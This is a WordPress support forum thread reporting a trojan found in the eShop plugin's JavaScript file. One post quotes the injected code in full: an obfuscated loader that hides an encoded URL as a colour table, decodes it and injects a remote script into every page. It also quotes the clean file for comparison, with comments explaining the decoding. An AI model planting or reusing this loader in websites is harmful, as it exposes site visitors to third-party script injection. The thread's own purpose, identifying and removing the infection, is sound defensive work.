
eShop
[closed] Trojan (5 posts)

  1. TheCellarRoom
    Member
    Posted 1 year ago #

    Found an eShop JavaScript file in the uploads folder. Avast and a number of other scanners recognised it as a trojan.

    It redirected customers making purchases to a Romanian website and/or to pradid.com/engine

    use with extreme caution!

  2. ClaytonJames
    Member
    Posted 1 year ago #

    I would be concerned about the possibility that the script is not related to the eShop plugin at all, but instead found its way onto your site through other means. Don't dismiss the possibility that there may be more than one explanation, unless you have solid evidence otherwise.

  3. TheCellarRoom
    Member
    Posted 1 year ago #

    Not dismissing any possibilities at all, but WordPress users should be aware that it might be a security issue if it can be targeted.

    // Injected loader followed by the plugin's own code (quoted as found on the site).
    // Everything from this `if` down to the `}` that is fused onto the `$eshopj=` line is
    // the injected part; the three statements after it match the clean file quoted later
    // in the thread. Summary for triage: the "colour" table is an encoded string, the
    // decoder turns it into a <script> tag / URL, and try_pick_colors() loads that URL as
    // a third-party script on every page view.
    //
    // The guard on `redef_colors` makes the loader run only once per page even if the
    // same snippet has been injected into several files.
    if (typeof(redef_colors)=="undefined")
    {
    
    // Not colours: each entry carries three hex byte pairs, and each pair encodes one
    // character as (character code + 15). "00" pairs are padding and are skipped by the
    // decoder. Decoding by hand gives a `<script type="text/javascript" src="http://…">`
    // tag whose host is a bare IPv4 address and whose path imitates a jQuery file name.
    var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000');
    
    var redef_colors = 1;
    // colors_picked is never read in this listing.
       var colors_picked = 0;
    
       // Decoder. `t` is the encoded table; `styled` selects the output form:
       //   truthy -> the full decoded tag, with '#' + current timestamp inserted just
       //             before its last two characters;
       //   falsy  -> only the part after the first 36 characters and before the last two
       //             (the URL), followed by '#' + current timestamp.
       // `j` and `i` are assigned without `var`, so they leak into the global scope.
       function div_pick_colors(t,styled) {
    
    var s = "";
    	for (j=0;j<t.length;j++) {	
    
    var c_rgb = t[j];
    		// i is incremented twice per pass (here and in substr(i++,2)), so the pairs
    		// are read at offsets 1, 3 and 5, i.e. after the leading '#'.
    		for (i=1;i<7;i++) {
    
    var c_clr = c_rgb.substr(i++,2);
    			if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
    		}
    	}
    
    // div_colors[1].substr(0,1) is just the '#' character taken from the table itself,
    // so the literal never appears next to the URL in the source.
    if (styled) {
    		s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
    	} else {
    		s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
    	}
    	return s;
       }
    
       // Loader. Writes the decoded tag with document.write() when the DOM methods are
       // missing, otherwise builds a <script> element whose src is the decoded URL and
       // appends it to <head>. The empty catch hides any failure from the console.
       function try_pick_colors() {
    	try {
    	   	if(!document.getElementById || !document.createElement){
    			document.write(div_pick_colors(div_colors,1));
    		   } else {
    			var new_cstyle=document.createElement("script");
    			new_cstyle.type="text/javascript";
    			new_cstyle.src=div_pick_colors(div_colors,0);
    			document.getElementsByTagName("head")[0].appendChild(new_cstyle);
    		}
    	} catch(e) { }
    	// check_colors_picked() is not defined anywhere in this listing; presumably the
    	// remotely loaded script supplies it (not verifiable from here). While the call
    	// throws, the whole loader is re-run every 500 ms, which appends a further
    	// <script> element on each retry. The string form of setTimeout is evaluated as
    	// code.
    	try {
    		check_colors_picked();
    	} catch(e) {
    		setTimeout("try_pick_colors()", 500);
    	}
       }
    
       try_pick_colors();
    
    // The closing brace of the injected block shares a line with the first statement of
    // the original file: the payload was prepended without a line break. What follows is
    // the plugin code: it submits the form with id "eshopgateway" as soon as the DOM is
    // ready, so the loader above runs on that same page.
    }$eshopj=jQuery.noConflict();
    $eshopj(document).ready(function () {
        $eshopj('#eshopgateway').submit();
    
    });

    This is the code that the anti-virus does not like; the clean version, however, should be:

    // Clean reference copy as quoted by the poster. Kept byte-for-byte so it can be
    // compared with a deployed file; any statement in front of the first line of a
    // deployed copy is a sign the file was modified.
    // jQuery.noConflict() hands `$` back to whatever owned it and returns jQuery, which
    // is stored in the global `$eshopj` (assigned without `var`).
    $eshopj=jQuery.noConflict();
    // On DOM ready, submit the form with id "eshopgateway" without user interaction.
    // NOTE(review): presumably this is the hand-off to the payment gateway; confirm
    // against a freshly downloaded copy of the plugin.
    $eshopj(document).ready(function () {
        $eshopj('#eshopgateway').submit();
    
    });
  4. ClaytonJames
    Member
    Posted 1 year ago #

    I've seen similar instances of this.

    http://sucuri.net/malware/malware-entry-mwjs1240

    http://malware.im/blackhole-defs_colors-and-createcss-injections/

    Perhaps your configuration left some files writable somehow.

    There may be other helpful info here as well;

    "function div_pick_colors(t,styled)"

  5. elfin
    Moderator
    Posted 1 year ago #

    Check your information before posting such ridiculous and slanderous claims. Re-download eShop and you'll see that it does not contain the so-called trojan you mention.
